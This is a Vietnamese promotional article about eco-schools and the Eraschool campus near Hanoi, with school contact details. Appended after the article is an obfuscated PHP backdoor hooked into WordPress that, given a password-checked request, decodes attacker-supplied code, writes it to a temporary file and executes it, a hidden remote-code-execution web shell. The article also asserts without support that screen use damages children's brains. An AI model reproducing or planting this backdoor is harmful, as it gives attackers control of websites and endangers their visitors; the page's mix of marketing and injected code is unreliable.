Trường học sinh thái nuôi dưỡng lòng tốt, hạnh phúc và sáng tạo như thế nào?

post

Trường học sinh thái là một trong những môi trường học tập được nhiều ba mẹ tin tưởng lựa chọn hàng đầu hiện nay. Mô hình trường học này không chỉ phù hợp với xu hướng phát triển bền vững mà còn giúp trẻ có cơ hội tìm hiểu nhiều hơn về thiên nhiên, học giữa thiên nhiên. Vậy trường sinh thái là gì? Trường nuôi dưỡng lòng tốt, hạnh phúc và sáng tạo cho trẻ như thế nào? Mời ba mẹ cùng tìm hiểu qua bài viết dưới đây. 

Trường học sinh thái là gì?

Trường học sinh thái tạo điều kiện cho trẻ tiếp xúc gần gũi với thiên nhiên 
Trường học sinh thái tạo điều kiện cho trẻ tiếp xúc gần gũi với thiên nhiên

Trường học sinh thái là một trong những mô hình trường học được khuyến khích phát triển hàng đầu hiện nay. Vậy trường học sinh thái là gì? Đây là mô hình trường học gắn với môi trường sinh thái được thiết kế nhằm mục tiêu nâng cao chất lượng giáo dục trong nhà trường, tạo niềm đam mê dạy và học cho cả giáo viên và học sinh. Ở các trường sinh thái, trẻ không chỉ được mở rộng không gian học tập để kích thích khả năng tư duy mà còn được tiếp cận chương trình giáo dục đổi mới sáng tạo với những bài học thiết thực về môi trường. 

Trường học sinh thái nuôi dưỡng lòng tốt, hạnh phúc và sáng tạo như thế nào?

Không gian học tập của trường sinh thái được mở rộng ra ngoài phạm vi lớp học 
Không gian học tập của trường sinh thái được mở rộng ra ngoài phạm vi lớp học

Nhiều nghiên cứu gần đây đã chỉ ra rằng thiên nhiên có thể giúp con người sống hạnh phúc hơn, khỏe mạnh hơn và sáng tạo hơn. Đây cũng là lý do mô hình trường học sinh thái đã và đang ngày càng được quan tâm phát triển. Vậy trường sinh thái nuôi dưỡng lòng tốt, hạnh phúc và sáng tạo như thế nào? 

  • Thứ nhất, trường sinh thái giúp học sinh giảm căng thẳng. 

Trường học sinh thái thường tổ chức nhiều hoạt động thể chất cũng như giúp trẻ có cơ hội được học tập trong môi trường gần gũi với thiên nhiên. Đây đều là những cách thức hiệu quả giúp giảm căng thẳng mà khoa học đã ghi nhận. 

  • Thứ hai, trường sinh thái giúp học sinh hạnh phúc hơn. 

Nhiều nghiên cứu thực tế đã chỉ ra rằng thiên nhiên có ảnh hưởng tích cực lên trạng thái cảm xúc và nhận thức của con người. Do đó việc học tập và tham gia hoạt động xanh trong trường học có thể giúp trẻ cảm thấy hạnh phúc hơn trong từng tiết học. 

  • Thứ ba, trường sinh thái giúp trẻ gia tăng sự sáng tạo 

Việc tiếp xúc hàng ngày với các thiết bị điện tử, công nghệ có thể khiến vỏ não trước bị tổn thương, từ đó ảnh hưởng đến khả năng sáng tạo. Tuy nhiên, những tổn thương này hoàn toàn có thể phục hồi thông qua việc tăng cường tiếp xúc gần gũi với thiên nhiên. Vì vậy việc tham gia các hoạt động tại trường học sinh thái chắc chắn có thể cải thiện khả năng tư duy sáng tạo cho trẻ. 

Eraschool – Trường sinh thái hàng đầu Hà Nội

Eraschool giúp trẻ được hòa mình vào không gian xanh ngay tại trường học 
Eraschool giúp trẻ được hòa mình vào không gian xanh ngay tại trường học

Eraschool là một trong những trường học sinh thái uy tín hàng đầu tại Hà Nội hiện nay vì một số ưu điểm sau: 

  • Cơ sở vật chất 

Với diện tích 20,000 m2, Eraschool luôn đảm bảo cung cấp đầy đủ cơ sở vật chất phù hợp với việc dạy và học chương trình giáo dục sinh thái theo định hướng giáo dục của nhà trường. Tại đây, các hoạt động luôn tuân thủ 2 nguyên tắc: trải nghiệm thực tế gắn với giáo dục sáng tạo và gần gũi với thiên nhiên nhất có thể. 

  • Quy tắc tổ chức lớp học 

Các lớp học ở Eraschool luôn được tổ chức theo nguyên tắc học từ thiên nhiên, học giữa thiên nhiên. Nhà trường luôn tin rằng thiên nhiên chính là môi trường giảng dạy ưu việt với khả năng kích thích sự sáng tạo cho trẻ. 

  • Chương trình giáo dục sinh thái 

Đến với Eraschool, ngoài chương trình học của hệ song ngữ và hệ quốc tế, trẻ cũng được tham gia vào chương trình giáo dục sinh thái. Đây là chương trình khuyến khích học sinh tham gia tích cực vào các hành động bảo vệ môi trường tại chính những địa điểm gần gũi nhất với các em như trường học, gia đình. Nội dung chương trình được đan cài trong mọi môn học cũng như hoạt động của trường, giúp các em hình thành nếp sống xanh, tinh thần trách nhiệm với bản thân và cộng đồng. 

Trên đây là một số thông tin cơ bản về mô hình trường học sinh thái nói chung và một số ưu điểm của trường sinh thái Eraschool. Nếu còn bất kỳ thắc mắc nào cần giải đáp, ba mẹ vui lòng liên hệ trực tiếp tới hotline của nhà trường để được tư vấn và hỗ trợ trong thời gian nhanh nhất! 

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}